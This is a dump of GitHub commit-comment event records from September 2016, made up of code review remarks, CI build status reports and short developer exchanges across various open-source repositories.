{"id":"4582205743","type":"CommitCommentEvent","actor":{"login":"mslaraba"},"repo":{"name":"GeekAbdelouahed/TouggourtiAndroid"},"payload":{"comment":{"id":19075791,"position":110,"line":92,"path":"app/src/main/java/touggourti/acamdimyatinfo/com/MainActivity.java","commit_id":"d6388c29b6b40d81f2a038916ea2f570711ea291","created_at":"2016-09-19T09:24:29Z","updated_at":"2016-09-19T09:24:29Z","body":"no need for AsyncWork, you can work in a synchronous way, no harm 😄 "}},"created_at":"2016-09-19T09:24:29Z"}
{"id":"4582206038","type":"CommitCommentEvent","actor":{"login":"brainstorm"},"repo":{"name":"brainstorm/bss"},"payload":{"comment":{"id":19075793,"position":null,"line":null,"path":null,"commit_id":"c0b2a41061be8903e583c7b0475a5c1b80bd25a0","created_at":"2016-09-19T09:24:33Z","updated_at":"2016-09-19T09:24:33Z","body":"As mentioned before, the streaming part is just a (small) part of the whole `bcl2fastq` parallelization/upgrade idea we discussed before ;)"}},"created_at":"2016-09-19T09:24:33Z"}
{"id":"4582206594","type":"CommitCommentEvent","actor":{"login":"SirLovi"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19075794,"position":null,"line":null,"path":null,"commit_id":"f1dc56067c3f4f59429006e48db5e9aed414b318","created_at":"2016-09-19T09:24:41Z","updated_at":"2016-09-19T09:24:41Z","body":"Nice! Thank you."}},"created_at":"2016-09-19T09:24:41Z"}
{"id":"4582206652","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075795,"position":53,"line":53,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"50f7c41ae4c92c45f753a408458e3041df227e99","created_at":"2016-09-19T09:24:42Z","updated_at":"2016-09-19T09:24:42Z","body":"Because stack.getContainers doesn't get the containers of the next stack as well."}},"created_at":"2016-09-19T09:24:42Z"}
{"id":"4582208294","type":"CommitCommentEvent","actor":{"login":"CloCkWeRX"},"repo":{"name":"Berky115/BlueBottle"},"payload":{"comment":{"id":19075798,"position":18,"line":21,"path":"lib/bluebottle/models/coffee.rb","commit_id":"55fc301728b302864d9014f55caf003ec3a7df10","created_at":"2016-09-19T09:25:06Z","updated_at":"2016-09-19T09:25:06Z","body":"Attr accessor does this for you, can skimp of accessor methods"}},"created_at":"2016-09-19T09:25:06Z"}
{"id":"4582208635","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19075799,"position":87,"line":61,"path":"band-web/src/main/webapp/publicbandprofile.xhtml","commit_id":"7356e704227690884d2289529f8a04bcc72b00bf","created_at":"2016-09-19T09:25:13Z","updated_at":"2016-09-19T09:25:13Z","body":"Rename the files to follow the lower camelcase convention."}},"created_at":"2016-09-19T09:25:13Z"}
{"id":"4582209324","type":"CommitCommentEvent","actor":{"login":"abrodkin"},"repo":{"name":"vlad-zakharov/u-boot"},"payload":{"comment":{"id":19075801,"position":8,"line":30,"path":"arch/arc/dts/axs10x.dts","commit_id":"2ba1560accd1e0bf62d30b7344381c27bab8ff1d","created_at":"2016-09-19T09:25:20Z","updated_at":"2016-09-19T09:25:20Z","body":"Pls refer to [ePAPR](https://www.power.org/download_file.php?file=7920) document for details on how each node and its enties are meant to be used."}},"created_at":"2016-09-19T09:25:20Z"}
{"id":"4582211041","type":"CommitCommentEvent","actor":{"login":"Kmanfi"},"repo":{"name":"cliffordwolf/yosys"},"payload":{"comment":{"id":19075806,"position":null,"line":null,"path":null,"commit_id":"2c031cd24f536a35a32ce3c78d548fa627265557","created_at":"2016-09-19T09:25:42Z","updated_at":"2016-09-19T09:25:42Z","body":"I confirm commit 5e155aa fix the original issue related to autotest.sh _tb."}},"created_at":"2016-09-19T09:25:42Z"}
{"id":"4582211239","type":"CommitCommentEvent","actor":{"login":"CloCkWeRX"},"repo":{"name":"Berky115/BlueBottle"},"payload":{"comment":{"id":19075807,"position":13,"line":17,"path":"lib/bluebottle/models/customer.rb","commit_id":"55fc301728b302864d9014f55caf003ec3a7df10","created_at":"2016-09-19T09:25:44Z","updated_at":"2016-09-19T09:25:44Z","body":"Prefer \r\n@subscriptions = {}"}},"created_at":"2016-09-19T09:25:44Z"}
{"id":"4582212211","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075810,"position":null,"line":null,"path":null,"commit_id":"d479e126e20dc175282b93439b35811ddc8e1f37","created_at":"2016-09-19T09:25:57Z","updated_at":"2016-09-19T09:25:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1040](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13483&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:10:15"}},"created_at":"2016-09-19T09:25:57Z"}
{"id":"4582212672","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075811,"position":57,"line":64,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"5d84490d701a49c32b39bb9fc07fe5a6c5512599","created_at":"2016-09-19T09:26:03Z","updated_at":"2016-09-19T09:26:03Z","body":"Parent.key != key. For instance;\r\nPrint speed-> key = print_speed, parent.key -> \"speed\""}},"created_at":"2016-09-19T09:26:03Z"}
{"id":"4582214024","type":"CommitCommentEvent","actor":{"login":"mslaraba"},"repo":{"name":"GeekAbdelouahed/TouggourtiAndroid"},"payload":{"comment":{"id":19075814,"position":124,"line":106,"path":"app/src/main/java/touggourti/acamdimyatinfo/com/MainActivity.java","commit_id":"d6388c29b6b40d81f2a038916ea2f570711ea291","created_at":"2016-09-19T09:26:21Z","updated_at":"2016-09-19T09:26:21Z","body":"use split instead\r\n\r\n```\r\nString string = \"004-034556\";\r\nString[] parts = string.split(\"-\");\r\nString part1 = parts[0]; // 004\r\nString part2 = parts[1]; // 034556\r\n```"}},"created_at":"2016-09-19T09:26:21Z"}
{"id":"4582214612","type":"CommitCommentEvent","actor":{"login":"giorgiosironi"},"repo":{"name":"elifesciences/elife-metrics-formula"},"payload":{"comment":{"id":19075817,"position":null,"line":null,"path":null,"commit_id":"166f3ea99b4c0945a9756bbf5b99ee56c0065830","created_at":"2016-09-19T09:26:29Z","updated_at":"2016-09-19T09:26:29Z","body":"The syntax of `dataset_pillar` is not clearly documented, but it comes from https://docs.saltstack.com/en/latest/ref/modules/all/salt.modules.pillar.html#salt.modules.pillar.get"}},"created_at":"2016-09-19T09:26:29Z"}
{"id":"4582215007","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075819,"position":null,"line":null,"path":null,"commit_id":"5bf1348e99cef86f5941f473c7bb6016ab521fa2","created_at":"2016-09-19T09:26:34Z","updated_at":"2016-09-19T09:26:34Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1042](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13493&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T09:26:34Z"}
{"id":"4582215293","type":"CommitCommentEvent","actor":{"login":"itJinCheng"},"repo":{"name":"jverkoey/nimbus"},"payload":{"comment":{"id":19075820,"position":null,"line":null,"path":null,"commit_id":"f10856e249ba0997f8d41a60829465f0fc3e6da7","created_at":"2016-09-19T09:26:38Z","updated_at":"2016-09-19T09:26:38Z","body":"Good job!"}},"created_at":"2016-09-19T09:26:38Z"}
{"id":"4582216343","type":"CommitCommentEvent","actor":{"login":"abrodkin"},"repo":{"name":"vlad-zakharov/u-boot"},"payload":{"comment":{"id":19075822,"position":4,"line":13,"path":"drivers/clk/Makefile","commit_id":"2ba1560accd1e0bf62d30b7344381c27bab8ff1d","created_at":"2016-09-19T09:26:53Z","updated_at":"2016-09-19T09:26:53Z","body":"Worth renaming `axc003` to `axs103`."}},"created_at":"2016-09-19T09:26:53Z"}
{"id":"4582216834","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075823,"position":null,"line":null,"path":null,"commit_id":"b43a5a7e317227b04f163f738a33ffd5ee0b64f3","created_at":"2016-09-19T09:26:59Z","updated_at":"2016-09-19T09:26:59Z","body":"Probably good to initialise all fields first before calling the `_on...Changed` functions at all."}},"created_at":"2016-09-19T09:26:59Z"}
{"id":"4582217797","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075825,"position":92,"line":99,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"5d84490d701a49c32b39bb9fc07fe5a6c5512599","created_at":"2016-09-19T09:27:13Z","updated_at":"2016-09-19T09:27:13Z","body":"User state of a setting means that it was changed in some way. I just copied this from the original QML handling of the setting. The state property is a bit of a mess. "}},"created_at":"2016-09-19T09:27:13Z"}
{"id":"4582219089","type":"CommitCommentEvent","actor":{"login":"zkzy"},"repo":{"name":"zkzy/MvpDemo"},"payload":{"comment":{"id":19075828,"position":null,"line":null,"path":null,"commit_id":"92d1382ce15d93a98d771b594c519467f882b6b9","created_at":"2016-09-19T09:27:29Z","updated_at":"2016-09-19T09:27:29Z","body":"这是一个简单的Mvp的小例子，其中参考了android源码设计模式解析与实战的内容，欢迎大家一起交流学习。"}},"created_at":"2016-09-19T09:27:29Z"}
{"id":"4582220288","type":"CommitCommentEvent","actor":{"login":"abrodkin"},"repo":{"name":"vlad-zakharov/u-boot"},"payload":{"comment":{"id":19075829,"position":18,"line":18,"path":"drivers/clk/clk_axc003.c","commit_id":"2ba1560accd1e0bf62d30b7344381c27bab8ff1d","created_at":"2016-09-19T09:27:45Z","updated_at":"2016-09-19T09:27:45Z","body":"Would be more future proof to instantiate fixed clock from DTS instead of hardcoding value here."}},"created_at":"2016-09-19T09:27:45Z"}
{"id":"4582220312","type":"CommitCommentEvent","actor":{"login":"doukai"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19075830,"position":null,"line":null,"path":null,"commit_id":"2591a254c1b76f738fe47b9030ced34894167f43","created_at":"2016-09-19T09:27:45Z","updated_at":"2016-09-19T09:27:45Z","body":"虚惊一场！"}},"created_at":"2016-09-19T09:27:45Z"}
{"id":"4582220653","type":"CommitCommentEvent","actor":{"login":"LevelX2"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":19075837,"position":null,"line":null,"path":null,"commit_id":"dba0f14591d3747684a9b2aa30b4edf8a3192cfc","created_at":"2016-09-19T09:27:51Z","updated_at":"2016-09-19T09:27:51Z","body":"Fixed with b89822a6551bd068083d27513f85928318e917a4"}},"created_at":"2016-09-19T09:27:51Z"}
{"id":"4582220705","type":"CommitCommentEvent","actor":{"login":"jsakuda"},"repo":{"name":"slickage/docker-ruby"},"payload":{"comment":{"id":19075838,"position":33,"line":33,"path":"Dockerfile","commit_id":"165a7003888ca1c13f954225df162363da169ecc","created_at":"2016-09-19T09:27:51Z","updated_at":"2016-09-19T09:27:51Z","body":"I think this is in here twice, does it need to be in a certain order or something?"}},"created_at":"2016-09-19T09:27:51Z"}
{"id":"4582224159","type":"CommitCommentEvent","actor":{"login":"masooh"},"repo":{"name":"SecurityRAT/SecurityRAT"},"payload":{"comment":{"id":19075844,"position":null,"line":null,"path":null,"commit_id":"bc2b5a4a2efca0a791981982540a5a1818f9cf2d","created_at":"2016-09-19T09:28:40Z","updated_at":"2016-09-19T09:28:40Z","body":"@rylyade1 First: Thank you for that feature.\r\nNotes on your commits: \r\n- please refer in your commits to the according issue (here #6) \r\n- please commit only major working blocks which have different commit messages, you can also use a feature branch and merge this branch on finishing the issue\r\n\r\nThis makes it easier to view the changes for a new feature/resolved issue. Thank you."}},"created_at":"2016-09-19T09:28:40Z"}
{"id":"4582224301","type":"CommitCommentEvent","actor":{"login":"HarukaMa"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19075846,"position":null,"line":null,"path":null,"commit_id":"2591a254c1b76f738fe47b9030ced34894167f43","created_at":"2016-09-19T09:28:42Z","updated_at":"2016-09-19T09:28:42Z","body":"wow a commit from future... and i sensed a `push --force` :p"}},"created_at":"2016-09-19T09:28:42Z"}
{"id":"4582225428","type":"CommitCommentEvent","actor":{"login":"CloCkWeRX"},"repo":{"name":"Berky115/BlueBottle"},"payload":{"comment":{"id":19075847,"position":28,"line":28,"path":"spec/bluebottle/coding_question_spec.rb","commit_id":"c68d9dce87a95c6c61b68c1aacda9a29befaea67","created_at":"2016-09-19T09:28:58Z","updated_at":"2016-09-19T09:28:58Z","body":"The context/naming here is not typical rspec style  - see betterspecs.org for general hints"}},"created_at":"2016-09-19T09:28:58Z"}
{"id":"4582228006","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":19075852,"position":null,"line":null,"path":null,"commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-19T09:29:32Z","updated_at":"2016-09-19T09:29:32Z","body":"@encukou I am not sure that it is necessary everywhere:\r\n\r\n- Mu - micro:bit in heading and the first word in the first sentence\r\n- uFlash - micro:bit in heading and mentioned in the first paragraph\r\n\r\nFor the esptool I can change first paragraph (added text in bold):\r\n\r\nIf you want to control your device **equipped with the ESP8266 chip** using MictoPython, first of all, you will need to write MicroPython firmware into the flash memory of your device.\r\n\r\nWhat do you think about it?"}},"created_at":"2016-09-19T09:29:32Z"}
{"id":"4582235100","type":"CommitCommentEvent","actor":{"login":"ryo2"},"repo":{"name":"FriendsOfCake/search"},"payload":{"comment":{"id":19075867,"position":null,"line":null,"path":null,"commit_id":"5a68d07621987b4c27d061a3d04a6d1c8bce7f3c","created_at":"2016-09-19T09:31:04Z","updated_at":"2016-09-19T09:31:04Z","body":"Hi, this change seems to cause a problem for multiselect parameters.\r\n\r\nex.\r\nhttp://example.ex/search?type[]=1&type[]=2\r\n`Hash::flatten($params);` makes $params like `['type.0' => 1, 'type.1' => 2]`.\r\nThen `array_intersect_key` remove them and they are ignored."}},"created_at":"2016-09-19T09:31:04Z"}
{"id":"4582239692","type":"CommitCommentEvent","actor":{"login":"Nasutya"},"repo":{"name":"Flexberry/ember-flexberry-gis"},"payload":{"comment":{"id":19075871,"position":2,"line":2,"path":"addon/components/base-control.js","commit_id":"301ce7ad298f29982321e11283dbd452228b4878","created_at":"2016-09-19T09:32:06Z","updated_at":"2016-09-19T09:32:06Z","body":"Accidentally."}},"created_at":"2016-09-19T09:32:06Z"}
{"id":"4582240720","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075876,"position":null,"line":null,"path":null,"commit_id":"f6ae31244c0665f52c88c09e3d6e1e400a6ee0b5","created_at":"2016-09-19T09:32:19Z","updated_at":"2016-09-19T09:32:19Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1041](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13490&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 221, ignored: 3 Build time: 00:08:30\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-19T09:32:19Z"}
{"id":"4582240725","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075877,"position":null,"line":null,"path":null,"commit_id":"95f4da2f013e2154a6a04a775a9dcd02310e750c","created_at":"2016-09-19T09:32:19Z","updated_at":"2016-09-19T09:32:19Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1043](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13496&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T09:32:19Z"}
{"id":"4582240987","type":"CommitCommentEvent","actor":{"login":"muyichuanqi"},"repo":{"name":"muyichuanqi/imooc"},"payload":{"comment":{"id":19075878,"position":null,"line":null,"path":null,"commit_id":"c95b78dc879b95771fa6ff7e0e6cacc62956341b","created_at":"2016-09-19T09:32:22Z","updated_at":"2016-09-19T09:32:22Z","body":"js存放位置"}},"created_at":"2016-09-19T09:32:22Z"}
{"id":"4582246132","type":"CommitCommentEvent","actor":{"login":"willsmithdev"},"repo":{"name":"willsmithdev/demo"},"payload":{"comment":{"id":19075892,"position":null,"line":null,"path":null,"commit_id":"f6191d5cbd9bc99a179d96cee2f7822ca6c36e00","created_at":"2016-09-19T09:33:28Z","updated_at":"2016-09-19T09:33:28Z","body":"test"}},"created_at":"2016-09-19T09:33:28Z"}
{"id":"4582246197","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075893,"position":6,"line":103,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"615ec67b1b78a903053a9d5e67eb760cc3f550a0","created_at":"2016-09-19T09:33:29Z","updated_at":"2016-09-19T09:33:29Z","body":"Why was this necessary? If it's not enabled, it can't override, yesno?\r\nOr was this a performance optimisation?"}},"created_at":"2016-09-19T09:33:29Z"}
{"id":"4582247333","type":"CommitCommentEvent","actor":{"login":"abrodkin"},"repo":{"name":"vlad-zakharov/u-boot"},"payload":{"comment":{"id":19075900,"position":73,"line":73,"path":"drivers/clk/clk_axc003.c","commit_id":"2ba1560accd1e0bf62d30b7344381c27bab8ff1d","created_at":"2016-09-19T09:33:45Z","updated_at":"2016-09-19T09:33:45Z","body":"Probably we may go without `volatile` here."}},"created_at":"2016-09-19T09:33:45Z"}
{"id":"4582247884","type":"CommitCommentEvent","actor":{"login":"willsmithdev"},"repo":{"name":"willsmithdev/demo"},"payload":{"comment":{"id":19075907,"position":6,"line":6,"path":"index.html","commit_id":"f6191d5cbd9bc99a179d96cee2f7822ca6c36e00","created_at":"2016-09-19T09:33:51Z","updated_at":"2016-09-19T09:33:51Z","body":"test"}},"created_at":"2016-09-19T09:33:51Z"}
{"id":"4582248846","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075910,"position":8,"line":7,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"7793cb16d1a421afc1e5badfc342d92f76fcb517","created_at":"2016-09-19T09:34:05Z","updated_at":"2016-09-19T09:34:05Z","body":"Aww... Empty documentation :("}},"created_at":"2016-09-19T09:34:05Z"}
{"id":"4582252901","type":"CommitCommentEvent","actor":{"login":"cloving"},"repo":{"name":"cloving/web-"},"payload":{"comment":{"id":19075920,"position":null,"line":null,"path":null,"commit_id":"63099ff2ec1478fa2db7bc01148fb5632d880d9b","created_at":"2016-09-19T09:35:00Z","updated_at":"2016-09-19T09:35:00Z","body":"去除无关的函数"}},"created_at":"2016-09-19T09:35:00Z"}
{"id":"4582255469","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075932,"position":null,"line":null,"path":null,"commit_id":"5bf1348e99cef86f5941f473c7bb6016ab521fa2","created_at":"2016-09-19T09:35:34Z","updated_at":"2016-09-19T09:35:34Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1042](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13493&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 249, ignored: 3 Build time: 00:08:59"}},"created_at":"2016-09-19T09:35:34Z"}
{"id":"4582256246","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19075935,"position":32,"line":32,"path":"static/js/services/merge-uri-parameters.js","commit_id":"5438c2e2265c6afc0fde227a57c51a72e4ff09fb","created_at":"2016-09-19T09:35:43Z","updated_at":"2016-09-19T09:35:43Z","body":"I got surprised when reading the tests : I expected that whatever params I pass end up in the URL. I guess the word \"merge\" doesn't specify how you merge.\r\n\r\nCan you rename `params` to `defaults`, and specify in the comment? (something like \"Set http params in the given `url` by using the `defaults`. This means existing params in `uri` are not modified.\")\r\n\r\n(considering renaming the service itself but can't find anything better that's not endlessly long.)\r\n"}},"created_at":"2016-09-19T09:35:43Z"}
{"id":"4582256801","type":"CommitCommentEvent","actor":{"login":"CApopsicle"},"repo":{"name":"cepave-f2e/vue-owl-ui"},"payload":{"comment":{"id":19075937,"position":4,"line":4,"path":"src/components/switch/index.js","commit_id":"79e27f723bf0c4aa8862c20dd57cfe78ee1b9aee","created_at":"2016-09-19T09:35:50Z","updated_at":"2016-09-19T09:35:50Z","body":"OK! "}},"created_at":"2016-09-19T09:35:50Z"}
{"id":"4582260922","type":"CommitCommentEvent","actor":{"login":"zweiss"},"repo":{"name":"zweiss/ML4CL_2016"},"payload":{"comment":{"id":19075947,"position":null,"line":null,"path":null,"commit_id":"53b95456be685698ca4ae5fb7cddcd7fab076ebe","created_at":"2016-09-19T09:36:43Z","updated_at":"2016-09-19T09:36:43Z","body":"Near final commit"}},"created_at":"2016-09-19T09:36:43Z"}
{"id":"4582261116","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19075948,"position":32,"line":32,"path":"static/js/services/merge-uri-parameters.js","commit_id":"5438c2e2265c6afc0fde227a57c51a72e4ff09fb","created_at":"2016-09-19T09:36:45Z","updated_at":"2016-09-19T09:36:45Z","body":"Fair call."}},"created_at":"2016-09-19T09:36:45Z"}
{"id":"4582261936","type":"CommitCommentEvent","actor":{"login":"frgm"},"repo":{"name":"sustrik/libdill"},"payload":{"comment":{"id":19075949,"position":null,"line":null,"path":null,"commit_id":"3fdded2a52a2f48101a03d573e3908a45782ae77","created_at":"2016-09-19T09:36:56Z","updated_at":"2016-09-19T09:36:56Z","body":"but not all HTML files were regenerated:\r\n5 vs. 22"}},"created_at":"2016-09-19T09:36:56Z"}
{"id":"4582262873","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19075952,"position":null,"line":null,"path":null,"commit_id":"4ec5e729c470bdad498777cd399e84cd461902eb","created_at":"2016-09-19T09:37:09Z","updated_at":"2016-09-19T09:37:09Z","body":"still seems to fail\r\nhttps://travis-ci.org/NixOS/nixpkgs/jobs/160979814"}},"created_at":"2016-09-19T09:37:09Z"}
{"id":"4582263536","type":"CommitCommentEvent","actor":{"login":"mksarge"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":19075973,"position":null,"line":null,"path":null,"commit_id":"d8256e9087cb250818ee665ab4252db6c01542e7","created_at":"2016-09-19T09:37:16Z","updated_at":"2016-09-19T09:37:16Z","body":"@rtholmes, in the previous version I wrote, the 'members' field of each GroupRepoDescription was equal to an array of the team's sids (as stored in grades.json), instead of converting them to the corresponding github username as specified by your GroupRepoDescription interface; so, I made the necessary changes to your promisified version. (Well, I actually wrote and tested it with callbacks, then promisified it like you did in the previous commit.)\r\n\r\nin the 'waterfall' function get_group_repo_descriptions(), I use another async method: _forEachOf_ (docs: http://caolan.github.io/async/docs.html#.eachOf).\r\n\r\nIn the first function is essentially a forloop to convert each sid to the corresponding GH username, if it exists.\r\n\r\n(Design question: if any team member sid does **not** have a corresponding GH username (ie. that student has not yet registered), what should happen? I decided to return an error which propagates to make getGroupDescription() fail.)\r\n\r\nThe second function, if no error was passed to it, adds the current team's GroupRepoDescription to the returnVal array like before, but now with usernames instead of sids in the 'members' property."}},"created_at":"2016-09-19T09:37:16Z"}
{"id":"4582264121","type":"CommitCommentEvent","actor":{"login":"TorsteinHonsi"},"repo":{"name":"highcharts/highcharts"},"payload":{"comment":{"id":19075974,"position":null,"line":null,"path":null,"commit_id":"c3eb0aaf16f5635cc71a7197a1b1ed1421002929","created_at":"2016-09-19T09:37:24Z","updated_at":"2016-09-19T09:37:24Z","body":"It will probably be out this week or the next."}},"created_at":"2016-09-19T09:37:24Z"}
{"id":"4582264885","type":"CommitCommentEvent","actor":{"login":"zweiss"},"repo":{"name":"zweiss/ML4CL_2016"},"payload":{"comment":{"id":19075975,"position":null,"line":null,"path":null,"commit_id":"53b95456be685698ca4ae5fb7cddcd7fab076ebe","created_at":"2016-09-19T09:37:34Z","updated_at":"2016-09-19T09:37:34Z","body":"..."}},"created_at":"2016-09-19T09:37:34Z"}
{"id":"4582267717","type":"CommitCommentEvent","actor":{"login":"svgeesus"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19075977,"position":130,"line":762,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T09:38:12Z","updated_at":"2016-09-19T09:38:12Z","body":"maybe divide these by 5 to give a 20 to 450 range centered on 100?"}},"created_at":"2016-09-19T09:38:12Z"}
{"id":"4582270636","type":"CommitCommentEvent","actor":{"login":"sraue"},"repo":{"name":"stefansaraev/TB"},"payload":{"comment":{"id":19075983,"position":null,"line":null,"path":null,"commit_id":"0e1c2f3829b6fe2cc74f168b303f0fa95ae55899","created_at":"2016-09-19T09:38:49Z","updated_at":"2016-09-19T09:38:49Z","body":"thanks much\r\n"}},"created_at":"2016-09-19T09:38:49Z"}
{"id":"4582273110","type":"CommitCommentEvent","actor":{"login":"bozana"},"repo":{"name":"pkp/ojs"},"payload":{"comment":{"id":19075985,"position":55,"line":935,"path":"classes/install/Upgrade.inc.php","commit_id":"6d15d1508ef2fdacd73efe9e268068cf44b263e1","created_at":"2016-09-19T09:39:21Z","updated_at":"2016-09-19T09:39:21Z","body":"should this be `$managerUsers` and `$managerUserGroup`?"}},"created_at":"2016-09-19T09:39:21Z"}
{"id":"4582273365","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075986,"position":null,"line":null,"path":null,"commit_id":"95f4da2f013e2154a6a04a775a9dcd02310e750c","created_at":"2016-09-19T09:39:24Z","updated_at":"2016-09-19T09:39:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1043](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13496&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 187, ignored: 3 Build time: 00:07:06\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-19T09:39:24Z"}
{"id":"4582275835","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075993,"position":null,"line":null,"path":null,"commit_id":"2a6a02c8dc4c95c0f75c90270b15a8bfc17bd9d8","created_at":"2016-09-19T09:39:56Z","updated_at":"2016-09-19T09:39:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1044](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13501&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T09:39:56Z"}
{"id":"4582276167","type":"CommitCommentEvent","actor":{"login":"svgeesus"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19075994,"position":171,"line":797,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T09:40:00Z","updated_at":"2016-09-19T09:40:00Z","body":"My preference is option 2 because slant is a continuous number whie italic or not seems to be a binary design choice.\r\nI would change my opinion if there was an example that interpolated usefully between roman and italic forms."}},"created_at":"2016-09-19T09:40:00Z"}
{"id":"4582280380","type":"CommitCommentEvent","actor":{"login":"svgeesus"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19076001,"position":197,"line":846,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T09:40:57Z","updated_at":"2016-09-19T09:40:57Z","body":"-90deg to 90deg seems like an understandable range which also matches the OT1.8 spec."}},"created_at":"2016-09-19T09:40:57Z"}
{"id":"4582283649","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19076005,"position":53,"line":53,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"50f7c41ae4c92c45f753a408458e3041df227e99","created_at":"2016-09-19T09:41:41Z","updated_at":"2016-09-19T09:41:41Z","body":"No, that's why it still needs to be inside the while loop. I was thinking something like this.\r\n\r\n    stack = self.__active_container_stack\r\n    while stack:\r\n        for container in stack.getContainers():\r\n            try:\r\n            ...\r\n        stack = stack.getNextStack()"}},"created_at":"2016-09-19T09:41:41Z"}
